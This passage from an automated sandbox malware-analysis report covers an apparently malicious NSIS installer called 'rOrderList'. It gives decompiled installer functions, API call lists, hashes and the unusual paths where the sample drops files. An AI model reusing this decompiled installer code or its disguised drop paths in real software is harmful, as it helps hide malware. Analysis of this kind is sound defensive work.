                                                                                      0x004067e8
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066BA
                                                                                      • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004055DB,Completed,00000000), ref: 004066CD
                                                                                      • SHGetSpecialFolderLocation.SHELL32(004055DB,00000000,00000000,Completed,?,004055DB,Completed,00000000), ref: 00406709
                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406717
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00406722
                                                                                      • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406748
                                                                                      • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055DB,Completed,00000000), ref: 004067A0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                      • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                      • API String ID: 717251189-905382516
                                                                                      • Opcode ID: 38017e281cbdb7417c2012656fef4ee0337fe8851ede187b0d7372585b90f889
                                                                                      • Instruction ID: 6f5f2b99d90c7511299ba9a64344c15edde84ad84532d0df03b232db96096e81
                                                                                      • Opcode Fuzzy Hash: 38017e281cbdb7417c2012656fef4ee0337fe8851ede187b0d7372585b90f889
                                                                                      • Instruction Fuzzy Hash: BA613671601111ABDF209F14DD80AAE37A5AF10718F52403FE943B72D0DB3E5AA6CB5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 502 40176f-401794 call 402d3e call 405e88 507 401796-40179c call 40653c 502->507 508 40179e-4017b0 call 40653c call 405e11 lstrcatW 502->508 513 4017b5-4017b6 call 4067eb 507->513 508->513 517 4017bb-4017bf 513->517 518 4017c1-4017cb call 40689a 517->518 519 4017f2-4017f5 517->519 526 4017dd-4017ef 518->526 527 4017cd-4017db CompareFileTime 518->527 520 4017f7-4017f8 call 40600d 519->520 521 4017fd-401819 call 406032 519->521 520->521 529 40181b-40181e 521->529 530 40188d-4018b6 call 4055a4 call 403309 521->530 526->519 527->526 531 401820-40185e call 40653c * 2 call 406579 call 40653c call 405ba2 529->531 532 40186f-401879 call 4055a4 529->532 542 4018b8-4018bc 530->542 543 4018be-4018ca SetFileTime 530->543 531->517 564 401864-401865 531->564 544 401882-401888 532->544 542->543 546 4018d0-4018db FindCloseChangeNotification 542->546 543->546 547 402bcb 544->547 550 4018e1-4018e4 546->550 551 402bc2-402bc5 546->551 552 402bcd-402bd1 547->552 554 4018e6-4018f7 call 406579 lstrcatW 550->554 555 4018f9-4018fc call 406579 550->555 551->547 561 401901-40239a call 405ba2 554->561 555->561 561->551 561->552 564->544 566 401867-401868 564->566 566->532
                                                                                      C-Code - Quality: 77%
                                                                                      			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                                      				void* __esi;
                                                                                      				void* _t35;
                                                                                      				void* _t43;
                                                                                      				void* _t45;
                                                                                      				FILETIME* _t51;
                                                                                      				FILETIME* _t64;
                                                                                      				void* _t66;
                                                                                      				signed int _t72;
                                                                                      				FILETIME* _t73;
                                                                                      				FILETIME* _t77;
                                                                                      				signed int _t79;
                                                                                      				WCHAR* _t81;
                                                                                      				void* _t83;
                                                                                      				void* _t84;
                                                                                      				void* _t86;
                                                                                      
                                                                                      				_t77 = __ebx;
                                                                                      				 *(_t86 - 8) = E00402D3E(0x31);
                                                                                      				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                                                      				_t35 = E00405E88( *(_t86 - 8));
                                                                                      				_push( *(_t86 - 8));
                                                                                      				_t81 = L"%PRO";
                                                                                      				if(_t35 == 0) {
                                                                                      					lstrcatW(E00405E11(E0040653C(_t81, L"C:\\Users\\Arthur\\AppData\\Local\\Interpartesforhold\\Strengelege\\Willness")), ??);
                                                                                      				} else {
                                                                                      					E0040653C();
                                                                                      				}
                                                                                      				E004067EB(_t81);
                                                                                      				while(1) {
                                                                                      					__eflags =  *(_t86 + 8) - 3;
                                                                                      					if( *(_t86 + 8) >= 3) {
                                                                                      						_t66 = E0040689A(_t81);
                                                                                      						_t79 = 0;
                                                                                      						__eflags = _t66 - _t77;
                                                                                      						if(_t66 != _t77) {
                                                                                      							_t73 = _t66 + 0x14;
                                                                                      							__eflags = _t73;
                                                                                      							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                                                      						}
                                                                                      						asm("sbb eax, eax");
                                                                                      						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                                      						__eflags = _t72;
                                                                                      						 *(_t86 + 8) = _t72;
                                                                                      					}
                                                                                      					__eflags =  *(_t86 + 8) - _t77;
                                                                                      					if( *(_t86 + 8) == _t77) {
                                                                                      						E0040600D(_t81);
                                                                                      					}
                                                                                      					__eflags =  *(_t86 + 8) - 1;
                                                                                      					_t43 = E00406032(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                                      					__eflags = _t43 - 0xffffffff;
                                                                                      					 *(_t86 - 0x38) = _t43;
                                                                                      					if(_t43 != 0xffffffff) {
                                                                                      						break;
                                                                                      					}
                                                                                      					__eflags =  *(_t86 + 8) - _t77;
                                                                                      					if( *(_t86 + 8) != _t77) {
                                                                                      						E004055A4(0xffffffe2,  *(_t86 - 8));
                                                                                      						__eflags =  *(_t86 + 8) - 2;
                                                                                      						if(__eflags == 0) {
                                                                                      							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                                      						}
                                                                                      						L31:
                                                                                      						 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t86 - 4));
                                                                                      						__eflags =  *0x42a308;
                                                                                      						goto L32;
                                                                                      					} else {
                                                                                      						E0040653C("C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervaldelingspunktets.Hor", _t83);
                                                                                      						E0040653C(_t83, _t81);
                                                                                      						E00406579(_t77, _t81, _t83, "C:\Users\Public\Documents\Trivialness\Nsketnkningers\Oplivningens.Agt->C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervalde",  *((intOrPtr*)(_t86 - 0x1c)));
                                                                                      						E0040653C(_t83, "C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervaldelingspunktets.Hor");
                                                                                      						_t64 = E00405BA2("C:\Users\Public\Documents\Trivialness\Nsketnkningers\Oplivningens.Agt->C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervalde",  *(_t86 - 0x30) >> 3) - 4;
                                                                                      						__eflags = _t64;
                                                                                      						if(_t64 == 0) {
                                                                                      							continue;
                                                                                      						} else {
                                                                                      							__eflags = _t64 == 1;
                                                                                      							if(_t64 == 1) {
                                                                                      								 *0x42a308 =  &( *0x42a308->dwLowDateTime);
                                                                                      								L32:
                                                                                      								_t51 = 0;
                                                                                      								__eflags = 0;
                                                                                      							} else {
                                                                                      								_push(_t81);
                                                                                      								_push(0xfffffffa);
                                                                                      								E004055A4();
                                                                                      								L29:
                                                                                      								_t51 = 0x7fffffff;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					L33:
                                                                                      					return _t51;
                                                                                      				}
                                                                                      				E004055A4(0xffffffea,  *(_t86 - 8)); // executed
                                                                                      				 *0x42a334 =  *0x42a334 + 1;
                                                                                      				_t45 = E00403309(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                                                      				 *0x42a334 =  *0x42a334 - 1;
                                                                                      				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                                                      				_t84 = _t45;
                                                                                      				if( *(_t86 - 0x24) != 0xffffffff) {
                                                                                      					L22:
                                                                                      					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                                                      				} else {
                                                                                      					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                                                      					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                                                      						goto L22;
                                                                                      					}
                                                                                      				}
                                                                                      				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                                                                                      				__eflags = _t84 - _t77;
                                                                                      				if(_t84 >= _t77) {
                                                                                      					goto L31;
                                                                                      				} else {
                                                                                      					__eflags = _t84 - 0xfffffffe;
                                                                                      					if(_t84 != 0xfffffffe) {
                                                                                      						E00406579(_t77, _t81, _t84, _t81, 0xffffffee);
                                                                                      					} else {
                                                                                      						E00406579(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                                                      						lstrcatW(_t81,  *(_t86 - 8));
                                                                                      					}
                                                                                      					_push(0x200010);
                                                                                      					_push(_t81);
                                                                                      					E00405BA2();
                                                                                      					goto L29;
                                                                                      				}
                                                                                      				goto L33;
                                                                                      			}


















                                                                                      0x0040176f
                                                                                      0x00401776
                                                                                      0x00401782
                                                                                      0x00401785
                                                                                      0x0040178a
                                                                                      0x0040178d
                                                                                      0x00401794
                                                                                      0x004017b0
                                                                                      0x00401796
                                                                                      0x00401797
                                                                                      0x00401797
                                                                                      0x004017b6
                                                                                      0x004017bb
                                                                                      0x004017bb
                                                                                      0x004017bf
                                                                                      0x004017c2
                                                                                      0x004017c7
                                                                                      0x004017c9
                                                                                      0x004017cb
                                                                                      0x004017d0
                                                                                      0x004017d0
                                                                                      0x004017db
                                                                                      0x004017db
                                                                                      0x004017ec
                                                                                      0x004017ee
                                                                                      0x004017ee
                                                                                      0x004017ef
                                                                                      0x004017ef
                                                                                      0x004017f2
                                                                                      0x004017f5
                                                                                      0x004017f8
                                                                                      0x004017f8
                                                                                      0x004017ff
                                                                                      0x0040180e
                                                                                      0x00401813
                                                                                      0x00401816
                                                                                      0x00401819
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040181b
                                                                                      0x0040181e
                                                                                      0x00401874
                                                                                      0x00401879
                                                                                      0x004015b6
                                                                                      0x00402925
                                                                                      0x00402925
                                                                                      0x00402bc2
                                                                                      0x00402bc5
                                                                                      0x00402bc5
                                                                                      0x00000000
                                                                                      0x00401820
                                                                                      0x00401826
                                                                                      0x0040182d
                                                                                      0x0040183a
                                                                                      0x00401845
                                                                                      0x0040185b
                                                                                      0x0040185b
                                                                                      0x0040185e
                                                                                      0x00000000
                                                                                      0x00401864
                                                                                      0x00401864
                                                                                      0x00401865
                                                                                      0x00401882
                                                                                      0x00402bcb
                                                                                      0x00402bcb
                                                                                      0x00402bcb
                                                                                      0x00401867
                                                                                      0x00401867
                                                                                      0x00401868
                                                                                      0x00401493
                                                                                      0x00402395
                                                                                      0x00402395
                                                                                      0x00402395
                                                                                      0x00401865
                                                                                      0x0040185e
                                                                                      0x00402bcd
                                                                                      0x00402bd1
                                                                                      0x00402bd1
                                                                                      0x00401892
                                                                                      0x00401897
                                                                                      0x004018a5
                                                                                      0x004018aa
                                                                                      0x004018b0
                                                                                      0x004018b4
                                                                                      0x004018b6
                                                                                      0x004018be
                                                                                      0x004018ca
                                                                                      0x004018b8
                                                                                      0x004018b8
                                                                                      0x004018bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004018bc
                                                                                      0x004018d3
                                                                                      0x004018d9
                                                                                      0x004018db
                                                                                      0x00000000
                                                                                      0x004018e1
                                                                                      0x004018e1
                                                                                      0x004018e4
                                                                                      0x004018fc
                                                                                      0x004018e6
                                                                                      0x004018e9
                                                                                      0x004018f2
                                                                                      0x004018f2
                                                                                      0x00401901
                                                                                      0x00401906
                                                                                      0x00402390
                                                                                      0x00000000
                                                                                      0x00402390
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,%PROGRAMFILES%,%PROGRAMFILES%,00000000,00000000,%PROGRAMFILES%,C:\Users\user\AppData\Local\Interpartesforhold\Strengelege\Willness,?,?,00000031), ref: 004017D5
                                                                                        • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                                                                                        • Part of subcall function 004055A4: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                                                                                        • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                                                                                        • Part of subcall function 004055A4: lstrcatW.KERNEL32(Completed,00403040), ref: 004055FF
                                                                                        • Part of subcall function 004055A4: SetWindowTextW.USER32(Completed,Completed), ref: 00405611
                                                                                        • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                                                                                        • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                                                                                        • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: %PROGRAMFILES%$C:\Users\user\AppData\Local\Interpartesforhold\Strengelege\Willness$C:\Users\Public\Documents\Trivialness\Nsketnkningers\Oplivningens.Agt->C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervalde$C:\Windows\Fonts\Haycap67\Baandet\Selvbiografien\Intervaldelingspunktets.Hor
                                                                                      • API String ID: 1941528284-953686615
                                                                                      • Opcode ID: 344f9ce48cf6562dd05dd2813acdaf0dd0fbb35e7a12c132ee38245e1fffac6e
                                                                                      • Instruction ID: 1f20f3305f5cdc04e1f2059eaac63a386f89c848407f65c8aae314978641b4a4
                                                                                      • Opcode Fuzzy Hash: 344f9ce48cf6562dd05dd2813acdaf0dd0fbb35e7a12c132ee38245e1fffac6e
                                                                                      • Instruction Fuzzy Hash: 08419431500114BACF10BFB9DD85DAE7A79EF45729B20423FF422B10E2D73C8A519A6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 568 4055a4-4055b9 569 405670-405674 568->569 570 4055bf-4055d0 568->570 571 4055d2-4055d6 call 406579 570->571 572 4055db-4055e7 lstrlenW 570->572 571->572 574 405604-405608 572->574 575 4055e9-4055f9 lstrlenW 572->575 577 405617-40561b 574->577 578 40560a-405611 SetWindowTextW 574->578 575->569 576 4055fb-4055ff lstrcatW 575->576 576->574 579 405661-405663 577->579 580 40561d-40565f SendMessageW * 3 577->580 578->577 579->569 581 405665-405668 579->581 580->579 581->569
                                                                                      C-Code - Quality: 100%
                                                                                      			E004055A4(signed int _a4, WCHAR* _a8) {
                                                                                      				struct HWND__* _v8;
                                                                                      				signed int _v12;
                                                                                      				WCHAR* _v32;
                                                                                      				long _v44;
                                                                                      				int _v48;
                                                                                      				void* _v52;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				WCHAR* _t27;
                                                                                      				signed int _t28;
                                                                                      				long _t29;
                                                                                      				signed int _t37;
                                                                                      				signed int _t38;
                                                                                      
                                                                                      				_t27 =  *0x429244;
                                                                                      				_v8 = _t27;
                                                                                      				if(_t27 != 0) {
                                                                                      					_t37 =  *0x42a334;
                                                                                      					_v12 = _t37;
                                                                                      					_t38 = _t37 & 0x00000001;
                                                                                      					if(_t38 == 0) {
                                                                                      						E00406579(_t38, 0, 0x422728, 0x422728, _a4);
                                                                                      					}
                                                                                      					_t27 = lstrlenW(0x422728);
                                                                                      					_a4 = _t27;
                                                                                      					if(_a8 == 0) {
                                                                                      						L6:
                                                                                      						if((_v12 & 0x00000004) == 0) {
                                                                                      							_t27 = SetWindowTextW( *0x429228, 0x422728); // executed
                                                                                      						}
                                                                                      						if((_v12 & 0x00000002) == 0) {
                                                                                      							_v32 = 0x422728;
                                                                                      							_v52 = 1;
                                                                                      							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                                                      							_v44 = 0;
                                                                                      							_v48 = _t29 - _t38;
                                                                                      							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                                                      							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                                                      						}
                                                                                      						if(_t38 != 0) {
                                                                                      							_t28 = _a4;
                                                                                      							0x422728[_t28] = 0;
                                                                                      							return _t28;
                                                                                      						}
                                                                                      					} else {
                                                                                      						_t27 = lstrlenW(_a8) + _a4;
                                                                                      						if(_t27 < 0x1000) {
                                                                                      							_t27 = lstrcatW(0x422728, _a8);
                                                                                      							goto L6;
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				return _t27;
                                                                                      			}

















                                                                                      0x004055aa
                                                                                      0x004055b4
                                                                                      0x004055b9
                                                                                      0x004055bf
                                                                                      0x004055ca
                                                                                      0x004055cd
                                                                                      0x004055d0
                                                                                      0x004055d6
                                                                                      0x004055d6
                                                                                      0x004055dc
                                                                                      0x004055e4
                                                                                      0x004055e7
                                                                                      0x00405604
                                                                                      0x00405608
                                                                                      0x00405611
                                                                                      0x00405611
                                                                                      0x0040561b
                                                                                      0x00405624
                                                                                      0x00405630
                                                                                      0x00405637
                                                                                      0x0040563b
                                                                                      0x0040563e
                                                                                      0x00405651
                                                                                      0x0040565f
                                                                                      0x0040565f
                                                                                      0x00405663
                                                                                      0x00405665
                                                                                      0x00405668
                                                                                      0x00000000
                                                                                      0x00405668
                                                                                      0x004055e9
                                                                                      0x004055f1
                                                                                      0x004055f9
                                                                                      0x004055ff
                                                                                      0x00000000
                                                                                      0x004055ff
                                                                                      0x004055f9
                                                                                      0x004055e7
                                                                                      0x00405674

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                                                                                      • lstrlenW.KERNEL32(00403040,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                                                                                      • lstrcatW.KERNEL32(Completed,00403040), ref: 004055FF
                                                                                      • SetWindowTextW.USER32(Completed,Completed), ref: 00405611
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID: Completed
                                                                                      • API String ID: 2531174081-3087654605
                                                                                      • Opcode ID: 9bf9a61cd925c99f1fada79dadb4955d0c20c7cfe3de02ce5ad3df310078830f
                                                                                      • Instruction ID: cea8892cb4e31635aa5f40387e4ea582d2b984c796fabda61e5f1d3d18a4122e
                                                                                      • Opcode Fuzzy Hash: 9bf9a61cd925c99f1fada79dadb4955d0c20c7cfe3de02ce5ad3df310078830f
                                                                                      • Instruction Fuzzy Hash: E6218E71900518BACB119F65DD44ECFBFB9EF45360F54443AF904B62A0C77A4A508FA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 582 4068c1-4068e1 GetSystemDirectoryW 583 4068e3 582->583 584 4068e5-4068e7 582->584 583->584 585 4068f8-4068fa 584->585 586 4068e9-4068f2 584->586 588 4068fb-40692e wsprintfW LoadLibraryExW 585->588 586->585 587 4068f4-4068f6 586->587 587->588
                                                                                      C-Code - Quality: 100%
                                                                                      			E004068C1(intOrPtr _a4) {
                                                                                      				short _v576;
                                                                                      				signed int _t13;
                                                                                      				struct HINSTANCE__* _t17;
                                                                                      				signed int _t19;
                                                                                      				void* _t24;
                                                                                      
                                                                                      				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                                      				if(_t13 > 0x104) {
                                                                                      					_t13 = 0;
                                                                                      				}
                                                                                      				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                                      					_t19 = 1;
                                                                                      				} else {
                                                                                      					_t19 = 0;
                                                                                      				}
                                                                                      				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                                      				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                                      				return _t17;
                                                                                      			}








                                                                                      0x004068d8
                                                                                      0x004068e1
                                                                                      0x004068e3
                                                                                      0x004068e3
                                                                                      0x004068e7
                                                                                      0x004068fa
                                                                                      0x004068f4
                                                                                      0x004068f4
                                                                                      0x004068f4
                                                                                      0x00406913
                                                                                      0x00406927
                                                                                      0x0040692e

                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                                                                                      • wsprintfW.USER32 ref: 00406913
                                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                      • API String ID: 2200240437-1946221925
                                                                                      • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                      • Instruction ID: 979e31ef7f6a653eb027d6e7281dab5f214eebcb072a06bc6d9d9cfc9f176359
                                                                                      • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                      • Instruction Fuzzy Hash: BDF02B71501219A7CB14BB68DD0DF9B376CEB00304F10447EA646F10D0EB7CDA68CB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 589 406061-40606d 590 40606e-4060a2 GetTickCount GetTempFileNameW 589->590 591 4060b1-4060b3 590->591 592 4060a4-4060a6 590->592 594 4060ab-4060ae 591->594 592->590 593 4060a8 592->593 593->594
                                                                                      C-Code - Quality: 100%
                                                                                      			E00406061(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                      				intOrPtr _v8;
                                                                                      				short _v12;
                                                                                      				short _t12;
                                                                                      				intOrPtr _t13;
                                                                                      				signed int _t14;
                                                                                      				WCHAR* _t17;
                                                                                      				signed int _t19;
                                                                                      				signed short _t23;
                                                                                      				WCHAR* _t26;
                                                                                      
                                                                                      				_t26 = _a4;
                                                                                      				_t23 = 0x64;
                                                                                      				while(1) {
                                                                                      					_t12 =  *L"nsa"; // 0x73006e
                                                                                      					_t23 = _t23 - 1;
                                                                                      					_v12 = _t12;
                                                                                      					_t13 =  *0x40a5ac; // 0x61
                                                                                      					_v8 = _t13;
                                                                                      					_t14 = GetTickCount();
                                                                                      					_t19 = 0x1a;
                                                                                      					_v8 = _v8 + _t14 % _t19;
                                                                                      					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                                      					if(_t17 != 0) {
                                                                                      						break;
